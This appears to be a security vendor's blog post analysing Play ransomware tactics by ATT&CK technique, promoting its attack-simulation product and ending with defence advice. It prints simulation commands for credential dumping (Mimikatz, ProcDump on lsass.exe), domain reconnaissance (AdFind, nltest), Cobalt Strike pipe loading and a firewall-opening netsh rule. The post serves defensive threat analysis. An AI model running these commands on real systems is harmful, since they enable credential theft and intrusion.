Sıla Özeren | February 26, 2025 | 12 MIN READ

LAST UPDATED ON FEBRUARY 26, 2025

Play Ransomware: Exposing One of 2024's Greediest Cyber Extortionists

Play ransomware, also known as PlayCrypt, is a cybercriminal group that emerged in 2022, responsible for ransomware attacks on various organizations worldwide. They employ a double-extortion model, encrypting systems after exfiltrating data, and instruct victims to contact them via email without specifying an initial ransom demand. The group has targeted over 300 entities across North America, South America, Europe, and Australia, affecting sectors such as telecommunications, healthcare, media, transportation, construction, and government.

In this blog, we will analyze the tactics, techniques, and procedures (TTPs) of the Play Ransomware group, providing detailed insights into their operational evolution, methods of attack, and the potential defense strategies that can help mitigate their impact.

Analyzing Play Ransomware's Advanced Tactics, Techniques, and Procedures (TTPs)

This section provides a comprehensive analysis of these TTPs, offering insights into how Play Ransomware operates and the tools they employ.

TA0002: Execution

T1106 - Native API

Creating CobaltStrike Default Named Pipes

Play ransomware actors have used Cobalt Strike, a widely used red teaming and post-exploitation tool, to assist with lateral movement and file execution. 

Originally designed for penetration testers, Cobalt Strike is frequently abused by threat actors to establish covert command-and-control (C2) channels, execute payloads, and escalate privileges while evading detection.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves creating CobaltStrike default name pipes.

CobaltStrike

cmd.exe /c rundll32.exe "%TMP%\cspipe.dll",cspipe

This command executes cmd.exe with the /c switch, launching rundll32.exe to load and run the cspipe function from cspipe.dll stored in the %TMP% directory. Rundll32.exe, a legitimate Windows utility, is commonly abused by attackers for executing malicious payloads while evading detection. 

In this case, cspipe.dll is part of Cobalt Strike, a well-known post-exploitation framework, and cspipe is used to establish a named pipe for covert command-and-control (C2) communication.

This action within the Play Ransomware threat in Picus SCV mimics attackers moving laterally within a network while blending in with legitimate system activity, making detection more difficult.

T1059 - Command and Scripting Interpreter

Using winPEAS for Privilege Escalation

Play ransomware leverages WinPEAS, a widely used Windows privilege escalation enumeration tool, to execute commands and gather information about system vulnerabilities. By abusing command and scripting interpreters, attackers can automate privilege escalation by identifying misconfigurations, weak permissions, stored credentials, or exploitable services. 

WinPEAS provides detailed insights into privilege escalation opportunities, allowing adversaries to gain higher privileges, execute malicious payloads with elevated access, and establish deeper control over the compromised system while evading security detections.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging Winpeas Windows Privilege Escalation Tool for command execution.

Winpeas Windows Privilege Escalation Tool

TA0003 - Persistence

T1543 - Create or Modify System Process

Creating a New Scheduled Task by using schtasks

Play ransomware was observed creating a new scheduled task using schtasks, a technique commonly employed for persistence and defense evasion. By scheduling a malicious PowerShell script to execute at a specific time, attackers ensure that their payload runs automatically without requiring direct user interaction. 

The task is disguised with a benign name and description to avoid suspicion, allowing the ransomware to maintain access, execute secondary payloads, or re-establish itself after system reboots. This method helps adversaries blend in with legitimate system activities while ensuring continued execution of their malicious operations.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging powershell for creating a scheduled task.

TA0007: Discovery

a. T1018 Discovery: Remote System Discovery

Leveraging the Adfind Tool

Play ransomware leverages Adfind, a legitimate command-line tool designed for querying Active Directory, to gather information about the target domain and operating systems. By executing specific LDAP queries, it enumerates domain-joined computers, extracting details such as hostnames, operating system versions, and other key attributes. 

This reconnaissance step helps attackers map the network, identify high-value targets, and plan lateral movement within the compromised environment.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves testing the ingress tool transfer of Adfind to the system.

For instance, Picus Security Control Validation runs the following payload, followed by a rewind process, to mimic Play Ransomware’s discovery technique.

cmd.exe /c ""%TMP%\adfind.exe" -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > "%TMP%\some.csv""

This command executes cmd.exe with the /c switch, which runs the specified command and then terminates. It calls adfind.exe from the %TMP% directory, a common location for attackers to drop temporary tools. 

adfind.exe is a legitimate Active Directory enumeration tool, and here it is used to query all computer objects (-f objectcategory=computer) and extract their name, cn (Common Name), OperatingSystem, and dNSHostName attributes. 

The results are formatted as CSV (-csv) and saved to a file named some.csv in the %TMP% directory. This technique is often used in reconnaissance phases of attacks to gather information about domain-joined machines.

b. T1018 Discovery: Remote System Discovery

Leveraging the nltest Tool

Play ransomware utilizes nltest, a built-in Windows command-line tool, to enumerate domain controllers within a target network. By running specific nltest commands, attackers can identify domain controllers, their roles, and trust relationships, providing crucial insights for lateral movement and privilege escalation. Since nltest is a legitimate administrative tool, its usage can blend in with normal network activity, making detection more challenging for defenders.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging a built-in tool called nltest.

cmd.exe /c nltest /dclist:

This command executes cmd.exe with the /c switch, which runs the specified command and then terminates. It calls nltest /dclist: to enumerate all domain controllers within the current Active Directory domain. Nltest is a legitimate Windows command-line tool used for network testing and domain-related queries. 

By running this command, an attacker can quickly obtain a list of domain controllers, which are critical infrastructure components responsible for authentication and directory services. This information is valuable for planning lateral movement and privilege escalation within a compromised environment.

T1082 - System Information Discovery

Gathering Disk Information from the Target via WMIC.exe

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging a built-in tool called WMIC.exe.

wmic.exe logicaldisk get size,freespace,caption

This technique mimics an attacker conducting system reconnaissance to gather information about the available disk space before deploying ransomware. 

system reconnaissance

By leveraging WMIC.exe, a legitimate Windows command-line utility, Play ransomware actors can retrieve details about logical drives, including their total size and free space. This information helps adversaries determine which drives contain valuable data and assess storage availability for encrypting files. Since WMIC.exe is a built-in tool commonly used by administrators, its abuse allows attackers to evade detection while silently preparing for data encryption or exfiltration.

T1087 - Account Discovery : Domain Account

Play Ransomware was observed executing Invoke-BloodHound function by using BloodHound tool's Ingestor.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging BloodHound Tool's Ingestor (Invoke-BloodHound) Function.

BloodHound Tool's Ingestor (Invoke-BloodHound) Function

TA0006: Credential Access

a. T1003.001 - OS Credential Dumping: LSASS Memory

Gather credentials using Mimikatz Tool

Play ransomware leverages Mimikatz, a well-known post-exploitation tool, to dump credentials from memory using the sekurlsa::logonPasswords module. This technique allows attackers to extract plaintext passwords, NTLM hashes, and Kerberos tickets from a compromised system, enabling privilege escalation and lateral movement. 

By obtaining valid credentials, adversaries can access additional machines, move deeper into the network, and escalate their attack without triggering traditional security controls. Since Mimikatz interacts directly with Windows' Local Security Authority Subsystem (LSASS), its use is a key indicator of credential theft in ransomware operations.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves the use of Mimikatz for credential dumping by extracting credentials from LSASS memory.

# Play Process
%TMP%\mimikatz22020220919x64.exe "privilege::debug" "sekurlsa::logonPasswords" exit
# Rewind Process
{predefined-file-delete} %TMP%\mimikatz22020220919x64.exe

Mimikatz

b. T1003.001 - OS Credential Dumping: LSASS Memory

Dump Address Space of lsass.exe via Procdump

Adversaries use ProcDump, a legitimate Sysinternals tool, to dump the memory of the Local Security Authority Subsystem Service (LSASS) for credential theft. By capturing an LSASS process dump, attackers can extract plaintext passwords, NTLM hashes, and Kerberos tickets, enabling privilege escalation and lateral movement. 

Since ProcDump is a trusted Microsoft tool designed for debugging, its abuse allows attackers to evade security detections that might flag traditional malware-based credential dumping techniques.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves the use of Procdump for credential dumping by extracting credentials from LSASS memory.

%TMP%\procdump.exe -accepteula -ma lsass.exe "%TMP%\lsass.dmp"

T1558 - Steal or Forge Kerberos Tickets

Play Ransomware uses Kerberoasting to extract Kerberos service ticket hashes for offline cracking, allowing them to obtain credentials for high-privilege domain accounts. In this case, the attacker executes "SigFlip.exe" to modify or manipulate the signature of MSBuild.exe, a trusted Microsoft binary, and outputs a tampered version as "notmsbuild.exe". 

MSBuild.exe is a known LOLBin (Living-Off-the-Land Binary) that attackers abuse to execute malicious payloads without triggering security alerts. By leveraging this technique, threat actors evade detection, execute arbitrary code stealthily, and move laterally within a compromised environment while extracting valuable credentials from Active Directory.

How Do We Help?

Perform Kerberoasting Attack by using Rubeus Tool (SigFlip)

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves use of Rubeus for Kerberoasting. 

 Rubeus

TA0011: Command and Control

T1090.001 - Proxy : Internal Proxy

Creating a Firewall Rule using the Netsh Tool

Play ransomware has been observed using the built-in Windows netsh command to manipulate firewall rules, a tactic aimed at bypassing security controls.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves creating a firewall using the Netsh tool.

By executing the following command, Picus SCV mimics the malware creating an inbound rule allowing traffic on TCP port 443. While this port is commonly used for HTTPS communication, attackers can exploit it to enable unauthorized access or maintain persistence. Modifying firewall settings helps evade detection by security tools that rely on network restrictions, allowing malicious activities to proceed uninterrupted.

cmd.exe /c netsh advfirewall firewall add rule name="adb" dir=in action=allow protocol=TCP localport=443

TA0040: Impact

T1491.001 - Defacement: Internal Defacement

Play ransomware was observed attempting to write a file to the C drive, likely to inform the victim about the attack. It then opens the file using notepad.exe, ensuring that the victim sees the ransom note or instructions immediately. 

This tactic is commonly used by ransomware operators to deliver their demands in a straightforward manner.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging the built-in tool notepad.exe in Windows OS.

# play process
cmd.exe /c notepad.exe "C:\ReadMe.txt"


# rewind process 1
taskkill.exe /f /im notepad.exe
# rewind process 2
cmd.exe /c del "C:\ReadMe.txt"

How Does Picus Help Against the Play Ransomware Threat Group?

We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.  

Picus Threat Library includes the following threats for Play Ransomware.

Threat ID

Threat Name

Attack Module

95549

Play Ransomware Campaign

Windows Endpoint

28161

Play Ransomware Download Threat

Network Infiltration

38463

Play Ransomware Email Threat

E-mail Infiltration

Defense Strategies Against Play Ransomware Attacks

Below are four key defense strategies to help mitigate the threat posed by Play ransomware attacks:

Deploy Advanced Endpoint Detection and Response (EDR) Solutions

Use EDR and next-generation antivirus tools that monitor for unusual behaviors—such as unauthorized process execution, log clearance, and lateral movement. These solutions can detect the atypical command executions and privilege escalation techniques employed by the Play Ransomware, helping to isolate and remediate compromised endpoints early in the attack chain. 

Continuously Test and Validate Security Controls

Enhance your security posture by regularly testing the effectiveness of your prevention and detection controls. Use Breach and Attack Simulation (BAS) solutions, such as the Picus Security Control Validation (SCV) product, to simulate real-world attack scenarios. This continuous validation process reveals control gaps and provides actionable recommendations, ensuring that your defenses remain robust against evolving threats.

Implement Network Segmentation and a Zero Trust Model

Limit lateral movement by segmenting networks and enforcing strict access controls. With a zero trust approach—including multi-factor authentication and least privilege access—if an endpoint is breached, attackers are confined to a limited portion of the network. This containment helps prevent the spread of ransomware across critical systems. 

Maintain Regular, Immutable Offline Backups and an Incident Response Plan

Regularly back up critical data using air-gapped or immutable storage that ransomware cannot alter or delete. Coupled with a well-practiced incident response plan (including network isolation procedures), this strategy ensures you can restore systems quickly, even if attackers disable local recovery options like Volume Shadow Copies. 

By integrating these layered defenses, organizations can significantly reduce the risk and potential impact of Play Ransomware attacks.

Conclusion

Play ransomware has emerged as one of the most aggressive cyber extortion groups, using advanced tactics, techniques, and procedures (TTPs) to infiltrate, persist, and evade detection. By abusing legitimate tools such as Cobalt Strike, Mimikatz, ProcDump, AdFind, and WinPEAS, the group conducts credential theft, privilege escalation, lateral movement, and data exfiltration. Their reliance on scheduled tasks, firewall rule modifications, and LOLBins (Living-Off-the-Land Binaries) makes detection difficult, allowing them to maintain control over compromised systems. 

To combat this evolving threat, organizations must deploy advanced endpoint detection and response (EDR) solutions, continuously validate security controls, enforce network segmentation, and maintain immutable backups. A proactive security posture is essential to minimizing the risk of Play ransomware and strengthening resilience against modern cyber threats.

Table of Contents